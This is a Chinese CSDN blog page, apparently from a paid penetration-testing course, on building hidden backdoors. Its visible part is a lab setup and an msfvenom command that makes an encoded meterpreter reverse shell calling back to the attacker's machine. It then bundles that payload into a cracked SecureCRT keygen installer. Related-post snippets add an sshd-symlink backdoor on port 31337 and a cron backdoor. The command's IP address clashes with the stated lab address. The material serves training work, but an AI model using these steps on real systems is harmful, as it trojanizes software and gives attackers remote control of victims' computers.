制作隐藏后门渗透windows/centos/ubuntu

最新推荐文章于 2023-05-14 11:37:15 发布
最新推荐文章于 2023-05-14 11:37:15 发布
阅读量390 收藏
点赞数
分类专栏: 网络安全全栈课程 渗透测试 文章标签: windows centos ubuntu 渗透
本文链接:https://blog.csdn.net/weixin_59679023/article/details/125012864
版权

一、某软件捆绑恶意程序渗透windows

实验环境:

某软件安装包

kali攻击机(192.168.98.30)

win7目标机(192.168.98.35)

blinding编译工具

实验步骤:

1、通过xshell上传blinding 、 SecureCRT-kg.exe 、 SecureCRT-kg.ico到kali机

2、生成后门

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.169.98.30 LPORT=5555 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe

3、给blinding赋予执行权限,使用blinding将msf后门捆绑到某软件 SecureCRT-kg.exe

chmod +x binding

./binding

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Cwillchris
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
利用metasploit渗透测试制作隐藏后门
wr456wr的博客
03-12 691
利用metasploit渗透测试制作隐藏后门 @目录 1. 使用ms17-010永恒之蓝漏洞对win7进行渗透 2. 制作linux无文件木马程序 3. 使用脚本来进行自动创建后门 使用ms17-010永恒之蓝漏洞对win7进行渗透 已知win7ip:192.168.47.129 使用nmap对其进行开放端口探测 在kali端使用msf加载辅助模块探测目标机是否存在ms17-010漏洞 [+] 192.168.47.129:445 - Host is likely VULNERABLE t
Window远程操作Ubuntu的GUI配置
深藏功与名
01-18 2295
首先需要下载的工具xming和putty的一个包。 xming:http://sourceforge.net/projects/xming/ putty的包:http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html 然后先生成私钥。 下面是方法:https://help.github.com/articles/g
win电脑远程操控ubuntu--xshell
jane_6091的博客
08-28 641
做一个项目的时候,有一个包硬是装不上去,老师建议我搭一个虚拟python环境,我搭好了,下面是通过xshell打开虚拟环境中的jupyter 1.进入虚拟环境 source venv/bin/activate venv是虚拟环境的名字 2.打开jupyter notebook jupyter notebook ip=0.0.0.0 这里因为我要将jupyter noteb...
Linux下查找后门程序 CentOS后门程序的shell脚本
09-15
主要介绍了Linux下查找后门程序 CentOS后门程序的shell脚本,需要的朋友可以参考下
Linux学习之Ubuntu利用Cron机制安装后门
weixin_42514162的博客
10-31 606
话说在前面,这是我看了另一个博主的文章,自己在自己的电脑上实验的结果,不是剽窃。原博主将得很详细,他的文章在这里。 首先,说明一下,Cron是ubuntu下默认启动的用户执行计划。它会按照设置,在固定的周期或者按照一定时间执行某一个任务。它是一项服务,你可以使用基本的服务查看状态命令等查看信息。 service cron status 查看普通用户的执行计划。(如果你显示没有计划不要着急,后面加上cron.allow和cron.deny)就有了。 crontab -l 查看crontab的选
里应外合:Linux下的后门和日志工具(ZT)
tianyu的专栏 - Linux site:blog.csdn.net/wishfly
03-04 1320
攻入Linux系统后,很多入侵者往往就开始得意忘形了。这其中还有一个原因,就是技术性也要求更高了。下面,我们来看看一些常用的经典工具。  1、从这里延伸:后门和连接工具  (1)Httptunnel  Tunnel的意思是隧道,通常HTTPTunnel被称之为HTTP暗道,它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙,实际上,它是在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙。
ubuntu后门清除
u012795264的博客
02-16 1213
可能是因为流量监听密码被搞了,来清理吧 netstat -an 有个长沙移动的ip 183.214.141.104 连接上了 使用 chkrootkit 检查发现 /sbin/init 被感染了 然后将这个ip添加黑名单 iptables -A INPUT -s 183.214.141.104 -p tcp -j drop
webmin web图形化管理linux安装包最新版 内附Ubuntu/CentOS安装包及源码安装包
10-08
webmin-2.102-1.noarch.rpm : 适用于 rhel / CentOS/ fedora 发行版的安装文件 webmin-2.102-minimal.tar.gz : 迷你版本安装源码包 webmin-2.102.tar.gz : 完整版安装源码包 demo.jpeg : 安装后的演示截图文件
使用Rufus制作CentOS/Ubuntu的UEFI安装
10-21
使用Rufus制作CentOS/Ubuntu的UEFI安装。
详解Ubuntu/CentOS下Apache多站点配置
09-15
UbuntuCentOS这两个常见的Linux发行版中,Apache服务器的配置略有不同,但核心概念是一致的,主要是利用虚拟主机(Virtual Hosts)功能实现。 首先,Apache虚拟主机的概念是基于请求的主机名(域名)或IP地址来...
网站后门辅查工具不让人在你网站有后门
05-24
不让人在你网站有后门 v0.1tool_setup.exe
定时备份脚本Centos7/windows10.zip
06-08
本文将详细解析"定时备份脚本Centos7/windows10.zip"中涉及的知识点,包括在CentOS 7和Windows 10操作系统上设置定时备份的方法。 在CentOS 7中,我们通常使用`cron`服务来实现定时任务。`cron`是一个Linux下的任务...
linux后门
一个码农的笔记
04-25 2403
如果你登陆到一台linux设备,并且拿到了了root权限,但是你不希望他丢,那么你要建立后门 首先第一种方法: ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 登陆的方式是: ssh root@ip -p 31337 密码随意 这种方法不太稳定,经常会因为各种原因失效。 第二种方法: [root@localhost
靶机渗透Ubuntu忘记密码
ray_kong的博客
09-11 308
ubuntu虚拟机忘记密码之重置密码
Windows和Linux操作系统
m0_74055786的博客
05-14 70
dos → windows(保留小程序)→ windows(powershell)服务器操作系统:windows server 2003, 2008 ,2012。服务器操作系统: Ubuntu server ,rhel , centos。桌面操作系统:Ubuntu desktop,fedora , kali。硬件→ kernel(内核)+ 程序(shell+系统级+扩展命令)用户 → Windows(基于gui)操作计算机。用户 → shell(基于cli)操作计算机。
kali渗透靶机---实验环境搭建资源&&问题解析
巴胡子
12-01 2864
1、开启BIOS 前提条件:bios已经虚拟开启,如果未开启,请点击这里查看开启步骤 进入BIOS不同的电脑品牌按键是不一样的,查看自己电脑开启BIOS虚拟的按键请看下图: 2、安装虚拟机: 两种虚拟机软件: VMware Workstation Pro(需要收费,前期免费体验,但较为好用) VirtualBox(完全免费版) 3、系统的安装分别如下: kali:作为攻击ubuntu:作为靶...
Centos Linux下使用Metasploit渗透android
qq_38082146的博客
12-07 413
Metasploit是一款开源的安全漏洞检测工具 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 这篇文档只适合在Centos Linux已经安装了Metasploit的大伙。没有安装Metasploit的...
vmware条件下使用kali linux虚拟机对windows10进行渗透攻击的记录(学习使用)
wcf2020的博客
11-14 8369
使用kali linux虚拟机对windows10进行渗透攻击的记录 一、安装vmware tools以保证在虚拟机上创建的文件与主机可相互移动: VMware Tools是VMware虚拟机中自带的一种增强工具,是VMware提供的增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。只有在VMware虚拟机中安装好了VMware Tools,才能实现主机与虚拟机之间的文件共享,同时可支持自由拖拽的功能,鼠标也可在虚拟机与主机之间自由移动(不用再按ctrl+alt),且虚拟机屏幕也可实现...
KaliLinux-nmap(众神之眼)高级应用-IDS与防火墙规避及漏洞利用脚本篇
易编橙 · 终身成长社群,相遇已是上上签!
03-31 2867
文章目录IDS与防火墙规避篇NSE脚本篇常用的脚本攻击案例扫描服务器常见的漏洞检查FTP是否存在匿名登陆利用DNS进行子域名暴力破解对MySQL进行暴力破解对MsSQL进行暴力破解对Oracle进行暴力破解对SSH进行暴力破解修改Nmap默认的UserAgentHTTP管道 IDS与防火墙规避篇 在实际应用场景中,Nmap提供了多种规避技巧用于IDS和防火墙的检测和屏蔽 下面是一些常用的规避方式 命令参数 参数详解 -f 将发送的检测数据包以分片碎片化的方式进行传输,用以规避IDS和防火
/dev/mapper/centos-home
最新发布
01-09
/dev/mapper/centos-home是Linux系统中的一个设备文件,它代表了一个逻辑卷(Logical Volume),用于存储用户的家目录(/home)。通过这个设备文件,可以对/home目录进行操作和管理。 如果你想恢复/home目录的内容,可以按照以下步骤进行操作: 1. 首先,确保/dev/mapper/centos-home有足够的空间分配给根目录。你可以使用以下命令来查看空间分配情况: ```shell df -h ``` 该命令会显示系统中各个文件系统的使用情况,你可以查看/dev/mapper/centos-home所在的文件系统的可用空间。 2. 如果/dev/mapper/centos-home有足够的空间分配给根目录,你可以使用以下命令来恢复/home目录的内容: ```shell mount /dev/mapper/centos-home /home ``` 该命令将把/dev/mapper/centos-home设备文件挂载到/home目录下,使得/home目录中的内容可以被访问和使用。 请注意,执行该命令需要具有管理员权限。如果你没有管理员权限,请联系系统管理员或使用sudo命令来执行该命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cwillchris

你的鼓励将让我产出更多优质干货

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值